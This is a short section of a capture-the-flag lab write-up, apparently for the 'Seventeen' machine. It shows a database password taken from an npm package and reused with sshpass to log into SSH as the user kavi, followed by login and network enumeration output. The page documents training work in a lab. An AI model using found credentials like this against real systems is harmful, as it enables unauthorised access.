Seventeen_Lateral_Movement_kavi

SSH

---

Testing the DB credential found in the npm package for password reuse against the SSH server

┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sshpass -p 'IhateMathematics123#' ssh kavi@$IP
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-177-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of tue jun 20 09:51:38 UTC 2023
 
  system load:                    1.59
  usage of /:                     60.4% of 11.75GB
  memory usage:                   60%
  swap usage:                     0%
  processes:                      365
  users logged in:                1
  ip address for eth0:            10.10.11.165
  ip address for br-3539a4850ffa: 172.20.0.1
  ip address for docker0:         172.17.0.1
  ip address for br-b3834f770aa3: 172.18.0.1
  ip address for br-cc437cf0c6a8: 172.19.0.1
 
 
18 updates can be applied immediately.
12 of these updates are standard security updates.
to see these additional updates run: apt list --upgradable
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
You have mail.
kavi@seventeen:~$ whoami
kavi
kavi@seventeen:~$ hostname
seventeen
kavi@seventeen:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:f7:8e brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.165/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: br-3539a4850ffa: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ad:ed:89:94 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-3539a4850ffa
       valid_lft forever preferred_lft forever
4: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:70:54:47:3c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
5: br-b3834f770aa3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:37:9a:86:c3 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-b3834f770aa3
       valid_lft forever preferred_lft forever
6: br-cc437cf0c6a8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:1e:d1:50:bc brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-cc437cf0c6a8
       valid_lft forever preferred_lft forever
8: veth3ba5125@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether f2:b1:d2:35:69:e4 brd ff:ff:ff:ff:ff:ff link-netnsid 0
10: veth029ff08@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-3539a4850ffa state UP group default 
    link/ether 32:da:9e:80:f5:5b brd ff:ff:ff:ff:ff:ff link-netnsid 1
12: veth26e4f9a@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 82:69:f7:99:dc:27 brd ff:ff:ff:ff:ff:ff link-netnsid 2
14: veth8c69545@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 7a:43:96:45:5d:56 brd ff:ff:ff:ff:ff:ff link-netnsid 3
16: veth0b6c881@if15: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:07:82:b4:22:4a brd ff:ff:ff:ff:ff:ff link-netnsid 4
18: veth4387c3f@if17: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ea:5b:23:3d:a5:a1 brd ff:ff:ff:ff:ff:ff link-netnsid 5
20: veth9eabe87@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 72:68:13:86:32:55 brd ff:ff:ff:ff:ff:ff link-netnsid 6
22: veth207300e@if21: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 22:38:d3:15:aa:3b brd ff:ff:ff:ff:ff:ff link-netnsid 7
24: veth9a8a4fa@if23: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether f6:44:eb:e1:ce:c6 brd ff:ff:ff:ff:ff:ff link-netnsid 8
26: veth983f638@if25: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 4a:f1:50:33:b2:d9 brd ff:ff:ff:ff:ff:ff link-netnsid 9
28: veth5e6b256@if27: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ba:66:eb:55:17:b4 brd ff:ff:ff:ff:ff:ff link-netnsid 10
30: veth38f14e2@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether de:e2:71:28:5b:b7 brd ff:ff:ff:ff:ff:ff link-netnsid 11

Password reuse confirmed for the kavi user Lateral Movement made to the kavi user via SSH